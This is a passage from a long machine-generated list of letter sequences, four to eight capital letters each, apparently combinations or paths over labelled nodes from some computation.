'A', 'P', 'Q'], ['J', 'A', 'P', 'L'], ['J', 'A', 'O', 'Q'], ['J', 'A', 'D', 'Q'], ['J', 'A', 'D', 'G'], ['J', 'A', 'D', 'L'], ['J', 'A', 'Q', 'L'], ['J', 'P', 'O', 'Q'], ['J', 'P', 'O', 'G'], ['J', 'P', 'Q', 'L'], ['J', 'P', 'G', 'L'], ['J', 'O', 'Q', 'G'], ['J', 'O', 'Q', 'L'], ['C', 'E', 'A', 'B'], ['C', 'E', 'A', 'O'], ['C', 'E', 'A', 'D'], ['C', 'E', 'A', 'Q'], ['C', 'E', 'K', 'Q'], ['C', 'E', 'K', 'G'], ['C', 'E', 'O', 'Q'], ['C', 'E', 'O', 'G'], ['C', 'F', 'A', 'B'], ['C', 'F', 'K', 'Q'], ['C', 'F', 'K', 'I'], ['C', 'F', 'K', 'G'], ['C', 'F', 'K', 'M'], ['C', 'F', 'O', 'Q'], ['C', 'F', 'O', 'I'], ['C', 'F', 'O', 'G'], ['C', 'F', 'O', 'M'], ['C', 'F', 'Q', 'M'], ['C', 'F', 'I', 'G'], ['C', 'F', 'I', 'M'], ['C', 'F', 'I', 'L'], ['C', 'F', 'G', 'M'], ['C', 'A', 'B', 'O'], ['C', 'A', 'B', 'Q'], ['C', 'A', 'B', 'I'], ['C', 'A', 'O', 'Q'], ['C', 'A', 'O', 'I'], ['C', 'A', 'D', 'Q'], ['C', 'A', 'D', 'I'], ['C', 'A', 'D', 'G'], ['C', 'A', 'I', 'L'], ['C', 'K', 'O', 'G'], ['C', 'K', 'I', 'G'], ['C', 'K', 'I', 'L'], ['C', 'O', 'Q', 'G'], ['C', 'O', 'I', 'G'], ['C', 'Q', 'I', 'L'], ['C', 'I', 'G', 'L'], ['E', 'K', 'B', 'H'], ['F', 'A', 'B', 'O'], ['F', 'A', 'B', 'Q'], ['F', 'A', 'B', 'M'], ['F', 'A', 'B', 'L'], ['F', 'K', 'B', 'H'], ['F', 'K', 'O', 'G'], ['F', 'K', 'Q', 'M'], ['F', 'K', 'Q', 'L'], ['F', 'K', 'G', 'M'], ['F', 'K', 'G', 'L'], ['F', 'K', 'M', 'L'], ['F', 'B', 'H', 'M'], ['F', 'O', 'Q', 'G'], ['F', 'O', 'Q', 'M'], ['F', 'O', 'Q', 'L'], ['F', 'O', 'G', 'M'], ['F', 'Q', 'M', 'L'], ['F', 'G', 'M', 'L'], ['A', 'B', 'H', 'D'], ['A', 'B', 'O', 'Q'], ['A', 'B', 'Q', 'L'], ['A', 'O', 'D', 'G'], ['A', 'O', 'Q', 'L'], ['A', 'D', 'Q', 'L'], ['A', 'D', 'G', 'L'], ['K', 'P', 'H', 'M'], ['K', 'P', 'Q', 'M'], ['K', 'P', 'G', 'M'], ['K', 'P', 'M', 'L'], ['K', 'H', 'D', 'Q'], ['K', 'H', 'D', 'I'], ['K', 'H', 'D', 'G'], ['K', 'H', 'D', 'M'], ['K', 'H', 'D', 'L'], ['K', 'O', 'Q', 'G'], ['K', 'O', 'I', 'G'], ['K', 'O', 'G', 'M'], ['K', 'Q', 'I', 'L'], ['K', 'Q', 'M', 'L'], ['K', 'I', 'G', 'M'], ['K', 'I', 'G', 'L'], ['K', 'I', 'M', 'L'], ['K', 'G', 'M', 'L'], ['P', 'H', 'D', 'M'], ['P', 'O', 'D', 'G'], ['P', 'O', 'Q', 'G'], ['P', 'O', 'Q', 'M'], ['P', 'O', 'Q', 'L'], ['P', 'O', 'G', 'M'], ['P', 'D', 'Q', 'L'], ['P', 'D', 'G', 'L'], ['P', 'Q', 'M', 'L'], ['P', 'G', 'M', 'L'], ['H', 'O', 'D', 'G'], ['H', 'D', 'Q', 'M'], ['H', 'D', 'Q', 'L'], ['H', 'D', 'I', 'G'], ['H', 'D', 'I', 'M'], ['H', 'D', 'I', 'L'], ['H', 'D', 'G', 'M'], ['H', 'D', 'G', 'L'], ['H', 'D', 'M', 'L'], ['O', 'D', 'Q', 'G'], ['O', 'D', 'I', 'G'], ['O', 'Q', 'I', 'L'], ['O', 'Q', 'G', 'M'], ['O', 'Q', 'G', 'L'], ['O', 'Q', 'M', 'L'], ['O', 'I', 'G', 'M'], ['D', 'Q', 'I', 'L'], ['D', 'I', 'G', 'L'], ['Q', 'I', 'M', 'L'], ['I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'I'], ['N', 'J', 'E', 'F', 'K'], ['N', 'J', 'E', 'F', 'B'], ['N', 'C', 'E', 'A', 'I'], ['N', 'C', 'E', 'K', 'I'], ['N', 'C', 'E', 'O', 'I'], ['N', 'C', 'E', 'I', 'G'], ['N', 'C', 'E', 'I', 'L'], ['N', 'E', 'K', 'B', 'H'], ['N', 'K', 'P', 'H', 'M'], ['N', 'K', 'P', 'I', 'M'], ['N', 'K', 'H', 'D', 'I'], ['N', 'K', 'O', 'I', 'G'], ['N', 'K', 'Q', 'I', 'L'], ['N', 'K', 'I', 'G', 'L'], ['N', 'P', 'O', 'I', 'G'], ['N', 'P', 'O', 'I', 'M'], ['N', 'P', 'D', 'I', 'G'], ['N', 'P', 'D', 'I', 'L'], ['N', 'P', 'Q', 'I', 'L'], ['N', 'P', 'I', 'G', 'M'], ['N', 'P', 'I', 'G', 'L'], ['N', 'P', 'I', 'M', 'L'], ['N', 'H', 'D', 'I', 'G'], ['N', 'H', 'D', 'I', 'L'], ['N', 'O', 'D', 'I', 'G'], ['N', 'O', 'Q', 'I', 'L'], ['N', 'D', 'Q', 'I', 'L'], ['N', 'D', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'K'], ['J', 'C', 'E', 'F', 'O'], ['J', 'C', 'E', 'F', 'Q'], ['J', 'C', 'E', 'F', 'G'], ['J', 'C', 'E', 'A', 'P'], ['J', 'C', 'E', 'A', 'O'], ['J', 'C', 'E', 'A', 'D'], ['J', 'C', 'E', 'A', 'Q'], ['J', 'C', 'E', 'P', 'O'], ['J', 'C', 'E', 'P', 'Q'], ['J', 'C', 'E', 'P', 'G'], ['J', 'C', 'E', 'O', 'Q'], ['J', 'C', 'E', 'O', 'G'], ['J', 'E', 'F', 'B', 'H'], ['J', 'E', 'F', 'P', 'M'], ['J', 'F', 'A', 'B', 'O'], ['J', 'F', 'A', 'B', 'Q'], ['J', 'F', 'A', 'B', 'L'], ['J', 'F', 'K', 'B', 'H'], ['J', 'F', 'K', 'P', 'M'], ['J', 'F', 'K', 'O', 'G'], ['J', 'F', 'K', 'Q', 'L'], ['J', 'F', 'K', 'G', 'L'], ['J', 'F', 'B', 'P', 'M'], ['J', 'F', 'P', 'O', 'M'], ['J', 'F', 'P', 'Q', 'M'], ['J', 'F', 'P', 'G', 'M'], ['J', 'F', 'P', 'M', 'L'], ['J', 'F', 'O', 'Q', 'G'], ['J', 'F', 'O', 'Q', 'L'], ['J', 'A', 'P', 'O', 'Q'], ['J', 'A', 'P', 'D', 'Q'], ['J', 'A', 'P', 'D', 'G'], ['J', 'A', 'P', 'D', 'L'], ['J', 'A', 'P', 'Q', 'L'], ['J', 'A', 'O', 'D', 'G'], ['J', 'A', 'O', 'Q', 'L'], ['J', 'A', 'D', 'Q', 'L'], ['J', 'A', 'D', 'G', 'L'], ['J', 'P', 'O', 'Q', 'G'], ['J', 'P', 'O', 'Q', 'L'], ['J', 'O', 'Q', 'G', 'L'], ['C', 'E', 'A', 'B', 'O'], ['C', 'E', 'A', 'B', 'Q'], ['C', 'E', 'A', 'O', 'Q'], ['C', 'E', 'A', 'D', 'Q'], ['C', 'E', 'A', 'D', 'G'], ['C', 'E', 'K', 'O', 'G'], ['C', 'E', 'O', 'Q', 'G'], ['C', 'F', 'A', 'B', 'O'], ['C', 'F', 'A', 'B', 'Q'], ['C', 'F', 'A', 'B', 'I'], ['C', 'F', 'A', 'B', 'M'], ['C', 'F', 'K', 'O', 'G'], ['C', 'F', 'K', 'Q', 'M'], ['C', 'F', 'K', 'I', 'G'], ['C', 'F', 'K', 'I', 'M'], ['C', 'F', 'K', 'I', 'L'], ['C', 'F', 'K', 'G', 'M'], ['C', 'F', 'O', 'Q', 'G'], ['C', 'F', 'O', 'Q', 'M'], ['C', 'F', 'O', 'I', 'G'], ['C', 'F', 'O', 'I', 'M'], ['C', 'F', 'O', 'G', 'M'], ['C', 'F', 'Q', 'I', 'L'], ['C', 'F', 'I', 'G', 'M'], ['C', 'F', 'I', 'G', 'L'], ['C', 'F', 'I', 'M', 'L'], ['C', 'A', 'B', 'H', 'D'], ['C', 'A', 'B', 'O', 'Q'], ['C', 'A', 'B', 'O', 'I'], ['C', 'A', 'B', 'I', 'L'], ['C', 'A', 'O', 'D', 'G'], ['C', 'A', 'D', 'I', 'G'], ['C', 'A', 'D', 'I', 'L'], ['C', 'A', 'Q', 'I', 'L'], ['C', 'K', 'O', 'Q', 'G'], ['C', 'K', 'O', 'I', 'G'], ['C', 'K', 'Q', 'I', 'L'], ['C', 'K', 'I', 'G', 'L'], ['C', 'O', 'Q', 'I', 'L'], ['F', 'A', 'B', 'H', 'D'], ['F', 'A', 'B', 'O', 'Q'], ['F', 'A', 'B', 'O', 'M'], ['F', 'A', 'B', 'Q', 'M'], ['F', 'A', 'B', 'Q', 'L'], ['F', 'A', 'B', 'M', 'L'], ['F', 'K', 'B', 'H', 'M'], ['F', 'K', 'O', 'Q', 'G'], ['F', 'K', 'O', 'G', 'M'], ['F', 'K', 'Q', 'M', 'L'], ['F', 'K', 'G', 'M', 'L'], ['F', 'O', 'Q', 'G', 'M'], ['F', 'O', 'Q', 'G', 'L'], ['F', 'O', 'Q', 'M', 'L'], ['A', 'K', 'B', 'H', 'D'], ['A', 'B', 'H', 'D', 'Q'], ['A', 'B', 'H', 'D', 'G'], ['A', 'B', 'H', 'D', 'L'], ['A', 'B', 'O', 'Q', 'L'], ['A', 'O', 'D', 'Q', 'G'], ['K', 'P', 'H', 'D', 'M'], ['K', 'P', 'O', 'G', 'M'], ['K', 'P', 'Q', 'M', 'L'], ['K', 'P', 'G', 'M', 'L'], ['K', 'H', 'O', 'D', 'G'], ['K', 'H', 'D', 'Q', 'M'], ['K', 'H', 'D', 'Q', 'L'], ['K', 'H', 'D', 'I', 'G'], ['K', 'H', 'D', 'I', 'M'], ['K', 'H', 'D', 'I', 'L'], ['K', 'H', 'D', 'G', 'M'], ['K', 'H', 'D', 'G', 'L'], ['K', 'H', 'D', 'M', 'L'], ['K', 'O', 'Q', 'G', 'M'], ['K', 'O', 'Q', 'G', 'L'], ['K', 'O', 'I', 'G', 'M'], ['K', 'Q', 'I', 'M', 'L'], ['K', 'I', 'G', 'M', 'L'], ['P', 'H', 'D', 'Q', 'M'], ['P', 'H', 'D', 'G', 'M'], ['P', 'H', 'D', 'M', 'L'], ['P', 'O', 'D', 'Q', 'G'], ['P', 'O', 'Q', 'G', 'M'], ['P', 'O', 'Q', 'G', 'L'], ['P', 'O', 'Q', 'M', 'L'], ['H', 'O', 'D', 'Q', 'G'], ['H', 'O', 'D', 'I', 'G'], ['H', 'O', 'D', 'G', 'M'], ['H', 'D', 'Q', 'I', 'L'], ['H', 'D', 'Q', 'M', 'L'], ['H', 'D', 'I', 'G', 'M'], ['H', 'D', 'I', 'G', 'L'], ['H', 'D', 'I', 'M', 'L'], ['H', 'D', 'G', 'M', 'L'], ['O', 'D', 'Q', 'G', 'L'], ['O', 'Q', 'I', 'G', 'L'], ['O', 'Q', 'I', 'M', 'L'], ['O', 'Q', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'I'], ['N', 'J', 'C', 'E', 'A', 'I'], ['N', 'J', 'C', 'E', 'P', 'I'], ['N', 'J', 'C', 'E', 'O', 'I'], ['N', 'J', 'C', 'E', 'I', 'G'], ['N', 'J', 'C', 'E', 'I', 'L'], ['N', 'J', 'E', 'F', 'B', 'H'], ['N', 'J', 'E', 'F', 'P', 'M'], ['N', 'C', 'E', 'A', 'B', 'I'], ['N', 'C', 'E', 'A', 'O', 'I'], ['N', 'C', 'E', 'A', 'D', 'I'], ['N', 'C', 'E', 'A', 'I', 'L'], ['N', 'C', 'E', 'K', 'I', 'G'], ['N', 'C', 'E', 'K', 'I', 'L'], ['N', 'C', 'E', 'O', 'I', 'G'], ['N', 'C', 'E', 'Q', 'I', 'L'], ['N', 'C', 'E', 'I', 'G', 'L'], ['N', 'K', 'P', 'I', 'G', 'M'], ['N', 'K', 'P', 'I', 'M', 'L'], ['N', 'K', 'H', 'D', 'I', 'G'], ['N', 'K', 'H', 'D', 'I', 'L'], ['N', 'P', 'H', 'D', 'I', 'M'], ['N', 'P', 'O', 'D', 'I', 'G'], ['N', 'P', 'O', 'Q', 'I', 'L'], ['N', 'P', 'O', 'I', 'G', 'M'], ['N', 'P', 'D', 'Q', 'I', 'L'], ['N', 'P', 'D', 'I', 'G', 'L'], ['N', 'P', 'Q', 'I', 'M', 'L'], ['N', 'P', 'I', 'G', 'M', 'L'], ['N', 'H', 'O', 'D', 'I', 'G'], ['N', 'H', 'D', 'Q', 'I', 'L'], ['N', 'H', 'D', 'I', 'G', 'L'], ['N', 'O', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'B'], ['J', 'C', 'E', 'F', 'K', 'Q'], ['J', 'C', 'E', 'F', 'K', 'G'], ['J', 'C', 'E', 'F', 'P', 'M'], ['J', 'C', 'E', 'F', 'O', 'Q'], ['J', 'C', 'E', 'F', 'O', 'G'], ['J', 'C', 'E', 'A', 'P', 'O'], ['J', 'C', 'E', 'A', 'P', 'D'], ['J', 'C', 'E', 'A', 'P', 'Q'], ['J', 'C', 'E', 'A', 'O', 'Q'], ['J', 'C', 'E', 'A', 'D', 'Q'], ['J', 'C', 'E', 'A', 'D', 'G'], ['J', 'C', 'E', 'P', 'O', 'Q'], ['J', 'C', 'E', 'P', 'O', 'G'], ['J', 'C', 'E', 'O', 'Q', 'G'], ['J', 'E', 'F', 'K', 'B', 'H'], ['J', 'E', 'F', 'K', 'P', 'M'], ['J', 'E', 'F', 'B', 'P', 'M'], ['J', 'F', 'A', 'B', 'P', 'M'], ['J', 'F', 'A', 'B', 'H', 'D'], ['J', 'F', 'A', 'B', 'O', 'Q'], ['J', 'F', 'A', 'B', 'Q', 'L'], ['J', 'F', 'K', 'P', 'Q', 'M'], ['J', 'F', 'K', 'P', 'G', 'M'], ['J', 'F', 'K', 'P', 'M', 'L'], ['J', 'F', 'K', 'O', 'Q', 'G'], ['J', 'F', 'B', 'P', 'H', 'M'], ['J', 'F', 'P', 'O', 'Q', 'M'], ['J', 'F', 'P', 'O', 'G', 'M'], ['J', 'F', 'P', 'Q', 'M', 'L'], ['J', 'F', 'P', 'G', 'M', 'L'], ['J', 'F', 'O', 'Q', 'G', 'L'], ['J', 'A', 'P', 'O', 'D', 'G'], ['J', 'A', 'P', 'O', 'Q', 'L'], ['J', 'A', 'P', 'D', 'Q', 'L'], ['J', 'A', 'P', 'D', 'G', 'L'], ['J', 'A', 'O', 'D', 'Q', 'G'], ['J', 'P', 'O', 'Q', 'G', 'L'], ['C', 'E', 'A', 'B', 'H', 'D'], ['C', 'E', 'A', 'B', 'O', 'Q'], ['C', 'E', 'A', 'O', 'D', 'G'], ['C', 'E', 'K', 'O', 'Q', 'G'], ['C', 'F', 'A', 'B', 'H', 'D'], ['C', 'F', 'A', 'B', 'O', 'Q'], ['C', 'F', 'A', 'B', 'O', 'I'], ['C', 'F', 'A', 'B', 'O', 'M'], ['C', 'F', 'A', 'B', 'Q', 'M'], ['C', 'F', 'A', 'B', 'I', 'M'], ['C', 'F', 'A', 'B', 'I', 'L'], ['C', 'F', 'K', 'O', 'Q', 'G'], ['C', 'F', 'K', 'O', 'I', 'G'], ['C', 'F', 'K', 'O', 'G', 'M'], ['C', 'F', 'K', 'Q', 'I', 'L'], ['C', 'F', 'K', 'I', 'G', 'M'], ['C', 'F', 'K', 'I', 'G', 'L'], ['C', 'F', 'K', 'I', 'M', 'L'], ['C', 'F', 'O', 'Q', 'I', 'L'], ['C', 'F', 'O', 'Q', 'G', 'M'], ['C', 'F', 'O', 'I', 'G', 'M'], ['C', 'F', 'Q', 'I', 'M', 'L'], ['C', 'F', 'I', 'G', 'M', 'L'], ['C', 'A', 'K', 'B', 'H', 'D'], ['C', 'A', 'B', 'H', 'D', 'Q'], ['C', 'A', 'B', 'H', 'D', 'I'], ['C', 'A', 'B', 'H', 'D', 'G'], ['C', 'A', 'B', 'Q', 'I', 'L'], ['C', 'A', 'O', 'D', 'Q', 'G'], ['C', 'A', 'O', 'D', 'I', 'G'], ['C', 'A', 'O', 'Q', 'I', 'L'], ['C', 'A', 'D', 'Q', 'I', 'L'], ['C', 'A', 'D', 'I', 'G', 'L'], ['C', 'O', 'Q', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'D'], ['F', 'A', 'B', 'H', 'D', 'Q'], ['F', 'A', 'B', 'H', 'D', 'G'], ['F', 'A', 'B', 'H', 'D', 'M'], ['F', 'A', 'B', 'H', 'D', 'L'], ['F', 'A', 'B', 'O', 'Q', 'M'], ['F', 'A', 'B', 'O', 'Q', 'L'], ['F', 'A', 'B', 'Q', 'M', 'L'], ['F', 'K', 'O', 'Q', 'G', 'M'], ['F', 'K', 'O', 'Q', 'G', 'L'], ['F', 'O', 'Q', 'G', 'M', 'L'], ['A', 'K', 'B', 'H', 'D', 'Q'], ['A', 'K', 'B', 'H', 'D', 'G'], ['A', 'K', 'B', 'H', 'D', 'L'], ['A', 'B', 'H', 'O', 'D', 'G'], ['A', 'B', 'H', 'D', 'Q', 'L'], ['A', 'B', 'H', 'D', 'G', 'L'], ['A', 'O', 'D', 'Q', 'G', 'L'], ['K', 'P', 'H', 'D', 'Q', 'M'], ['K', 'P', 'H', 'D', 'G', 'M'], ['K', 'P', 'H', 'D', 'M', 'L'], ['K', 'P', 'O', 'Q', 'G', 'M'], ['K', 'H', 'O', 'D', 'Q', 'G'], ['K', 'H', 'O', 'D', 'I', 'G'], ['K', 'H', 'O', 'D', 'G', 'M'], ['K', 'H', 'D', 'Q', 'I', 'L'], ['K', 'H', 'D', 'Q', 'M', 'L'], ['K', 'H', 'D', 'I', 'G', 'M'], ['K', 'H', 'D', 'I', 'G', 'L'], ['K', 'H', 'D', 'I', 'M', 'L'], ['K', 'H', 'D', 'G', 'M', 'L'], ['K', 'O', 'Q', 'I', 'G', 'L'], ['K', 'O', 'Q', 'G', 'M', 'L'], ['P', 'H', 'O', 'D', 'G', 'M'], ['P', 'H', 'D', 'Q', 'M', 'L'], ['P', 'H', 'D', 'G', 'M', 'L'], ['P', 'O', 'D', 'Q', 'G', 'L'], ['P', 'O', 'Q', 'G', 'M', 'L'], ['H', 'O', 'D', 'Q', 'G', 'M'], ['H', 'O', 'D', 'Q', 'G', 'L'], ['H', 'O', 'D', 'I', 'G', 'M'], ['H', 'D', 'Q', 'I', 'M', 'L'], ['H', 'D', 'I', 'G', 'M', 'L'], ['O', 'D', 'Q', 'I', 'G', 'L'], ['O', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'I'], ['N', 'J', 'C', 'E', 'F', 'O', 'I'], ['N', 'J', 'C', 'E', 'F', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'I'], ['N', 'J', 'C', 'E', 'A', 'O', 'I'], ['N', 'J', 'C', 'E', 'A', 'D', 'I'], ['N', 'J', 'C', 'E', 'A', 'I', 'L'], ['N', 'J', 'C', 'E', 'P', 'O', 'I'], ['N', 'J', 'C', 'E', 'P', 'I', 'G'], ['N', 'J', 'C', 'E', 'P', 'I', 'L'], ['N', 'J', 'C', 'E', 'O', 'I', 'G'], ['N', 'J', 'C', 'E', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'I', 'G', 'L'], ['N', 'J', 'E', 'F', 'K', 'B', 'H'], ['N', 'J', 'E', 'F', 'K', 'P', 'M'], ['N', 'J', 'E', 'F', 'B', 'P', 'M'], ['N', 'C', 'E', 'A', 'B', 'O', 'I'], ['N', 'C', 'E', 'A', 'B', 'I', 'L'], ['N', 'C', 'E', 'A', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'D', 'I', 'L'], ['N', 'C', 'E', 'A', 'Q', 'I', 'L'], ['N', 'C', 'E', 'K', 'O', 'I', 'G'], ['N', 'C', 'E', 'K', 'Q', 'I', 'L'], ['N', 'C', 'E', 'K', 'I', 'G', 'L'], ['N', 'C', 'E', 'O', 'Q', 'I', 'L'], ['N', 'K', 'P', 'H', 'D', 'I', 'M'], ['N', 'K', 'P', 'O', 'I', 'G', 'M'], ['N', 'K', 'P', 'Q', 'I', 'M', 'L'], ['N', 'K', 'P', 'I', 'G', 'M', 'L'], ['N', 'K', 'H', 'O', 'D', 'I', 'G'], ['N', 'K', 'H', 'D', 'Q', 'I', 'L'], ['N', 'K', 'H', 'D', 'I', 'G', 'L'], ['N', 'K', 'O', 'Q', 'I', 'G', 'L'], ['N', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'P', 'H', 'D', 'I', 'M', 'L'], ['N', 'P', 'O', 'Q', 'I', 'G', 'L'], ['N', 'P', 'O', 'Q', 'I', 'M', 'L'], ['N', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'B', 'O'], ['J', 'C', 'E', 'F', 'A', 'B', 'Q'], ['J', 'C', 'E', 'F', 'K', 'P', 'M'], ['J', 'C', 'E', 'F', 'K', 'O', 'G'], ['J', 'C', 'E', 'F', 'P', 'O', 'M'], ['J', 'C', 'E', 'F', 'P', 'Q', 'M'], ['J', 'C', 'E', 'F', 'P', 'G', 'M'], ['J', 'C', 'E', 'F', 'O', 'Q', 'G'], ['J', 'C', 'E', 'A', 'P', 'O', 'Q'], ['J', 'C', 'E', 'A', 'P', 'D', 'Q'], ['J', 'C', 'E', 'A', 'P', 'D', 'G'], ['J', 'C', 'E', 'A', 'O', 'D', 'G'], ['J', 'C', 'E', 'P', 'O', 'Q', 'G'], ['J', 'E', 'F', 'B', 'P', 'H', 'M'], ['J', 'F', 'A', 'K', 'B', 'H', 'D'], ['J', 'F', 'A', 'B', 'P', 'O', 'M'], ['J', 'F', 'A', 'B', 'P', 'Q', 'M'], ['J', 'F', 'A', 'B', 'P', 'M', 'L'], ['J', 'F', 'A', 'B', 'H', 'D', 'Q'], ['J', 'F', 'A', 'B', 'H', 'D', 'G'], ['J', 'F', 'A', 'B', 'H', 'D', 'L'], ['J', 'F', 'A', 'B', 'O', 'Q', 'L'], ['J', 'F', 'K', 'B', 'P', 'H', 'M'], ['J', 'F', 'K', 'P', 'O', 'G', 'M'], ['J', 'F', 'K', 'P', 'Q', 'M', 'L'], ['J', 'F', 'K', 'P', 'G', 'M', 'L'], ['J', 'F', 'K', 'O', 'Q', 'G', 'L'], ['J', 'F', 'P', 'O', 'Q', 'G', 'M'], ['J', 'F', 'P', 'O', 'Q', 'M', 'L'], ['J', 'A', 'P', 'O', 'D', 'Q', 'G'], ['J', 'A', 'O', 'D', 'Q', 'G', 'L'], ['C', 'E', 'A', 'K', 'B', 'H', 'D'], ['C', 'E', 'A', 'B', 'H', 'D', 'Q'], ['C', 'E', 'A', 'B', 'H', 'D', 'G'], ['C', 'E', 'A', 'O', 'D', 'Q', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D'], ['C', 'F', 'A', 'B', 'H', 'D', 'Q'], ['C', 'F', 'A', 'B', 'H', 'D', 'I'], ['C', 'F', 'A', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'M'], ['C', 'F', 'A', 'B', 'O', 'Q', 'M'], ['C', 'F', 'A', 'B', 'O', 'I', 'M'], ['C', 'F', 'A', 'B', 'Q', 'I', 'L'], ['C', 'F', 'A', 'B', 'I', 'M', 'L'], ['C', 'F', 'K', 'O', 'Q', 'G', 'M'], ['C', 'F', 'K', 'O', 'I', 'G', 'M'], ['C', 'F', 'K', 'Q', 'I', 'M', 'L'], ['C', 'F', 'K', 'I', 'G', 'M', 'L'], ['C', 'F', 'O', 'Q', 'I', 'G', 'L'], ['C', 'F', 'O', 'Q', 'I', 'M', 'L'], ['C', 'A', 'K', 'B', 'H', 'D', 'Q'], ['C', 'A', 'K', 'B', 'H', 'D', 'I'], ['C', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'A', 'B', 'H', 'O', 'D', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'L'], ['C', 'A', 'B', 'O', 'Q', 'I', 'L'], ['C', 'K', 'O', 'Q', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'D', 'Q'], ['F', 'A', 'K', 'B', 'H', 'D', 'G'], ['F', 'A', 'K', 'B', 'H', 'D', 'M'], ['F', 'A', 'K', 'B', 'H', 'D', 'L'], ['F', 'A', 'B', 'H', 'O', 'D', 'G'], ['F', 'A', 'B', 'H', 'D', 'Q', 'M'], ['F', 'A', 'B', 'H', 'D', 'Q', 'L'], ['F', 'A', 'B', 'H', 'D', 'G', 'M'], ['F', 'A', 'B', 'H', 'D', 'G', 'L'], ['F', 'A', 'B', 'H', 'D', 'M', 'L'], ['F', 'A', 'B', 'O', 'Q', 'M', 'L'], ['F', 'K', 'O', 'Q', 'G', 'M', 'L'], ['A', 'K', 'B', 'H', 'O', 'D', 'G'], ['A', 'K', 'B', 'H', 'D', 'Q', 'L'], ['A', 'K', 'B', 'H', 'D', 'G', 'L'], ['A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['K', 'P', 'H', 'O', 'D', 'G', 'M'], ['K', 'P', 'H', 'D', 'Q', 'M', 'L'], ['K', 'P', 'H', 'D', 'G', 'M', 'L'], ['K', 'P', 'O', 'Q', 'G', 'M', 'L'], ['K', 'H', 'O', 'D', 'Q', 'G', 'M'], ['K', 'H', 'O', 'D', 'Q', 'G', 'L'], ['K', 'H', 'O', 'D', 'I', 'G', 'M'], ['K', 'H', 'D', 'Q', 'I', 'M', 'L'], ['K', 'H', 'D', 'I', 'G', 'M', 'L'], ['K', 'O', 'Q', 'I', 'G', 'M', 'L'], ['P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'I'], ['N', 'J', 'C', 'E', 'F', 'K', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'K', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'O', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'O', 'I'], ['N', 'J', 'C', 'E', 'A', 'P', 'D', 'I'], ['N', 'J', 'C', 'E', 'A', 'P', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'A', 'D', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'P', 'O', 'I', 'G'], ['N', 'J', 'C', 'E', 'P', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'P', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'O', 'Q', 'I', 'L'], ['N', 'J', 'E', 'F', 'B', 'P', 'H', 'M'], ['N', 'C', 'E', 'A', 'B', 'H', 'D', 'I'], ['N', 'C', 'E', 'A', 'B', 'Q', 'I', 'L'], ['N', 'C', 'E', 'A', 'O', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'O', 'Q', 'I', 'L'], ['N', 'C', 'E', 'A', 'D', 'Q', 'I', 'L'], ['N', 'C', 'E', 'A', 'D', 'I', 'G', 'L'], ['N', 'C', 'E', 'O', 'Q', 'I', 'G', 'L'], ['N', 'K', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'K', 'P', 'H', 'D', 'I', 'M', 'L'], ['N', 'P', 'H', 'O', 'D', 'I', 'G', 'M'], ['N', 'P', 'H', 'D', 'Q', 'I', 'M', 'L'], ['N', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'P', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'P', 'O', 'Q', 'I', 'G', 'M', 'L'], ['N', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D'], ['J', 'C', 'E', 'F', 'A', 'B', 'O', 'Q'], ['J', 'C', 'E', 'F', 'K', 'P', 'Q', 'M'], ['J', 'C', 'E', 'F', 'K', 'P', 'G', 'M'], ['J', 'C', 'E', 'F', 'K', 'O', 'Q', 'G'], ['J', 'C', 'E', 'F', 'P', 'O', 'Q', 'M'], ['J', 'C', 'E', 'F', 'P', 'O', 'G', 'M'], ['J', 'C', 'E', 'A', 'P', 'O', 'D', 'G'], ['J', 'C', 'E', 'A', 'O', 'D', 'Q', 'G'], ['J', 'E', 'F', 'K', 'B', 'P', 'H', 'M'], ['J', 'F', 'A', 'K', 'B', 'H', 'D', 'Q'], ['J', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['J', 'F', 'A', 'K', 'B', 'H', 'D', 'L'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'M'], ['J', 'F', 'A', 'B', 'P', 'O', 'Q', 'M'], ['J', 'F', 'A', 'B', 'P', 'Q', 'M', 'L'], ['J', 'F', 'A', 'B', 'H', 'O', 'D', 'G'], ['J', 'F', 'A', 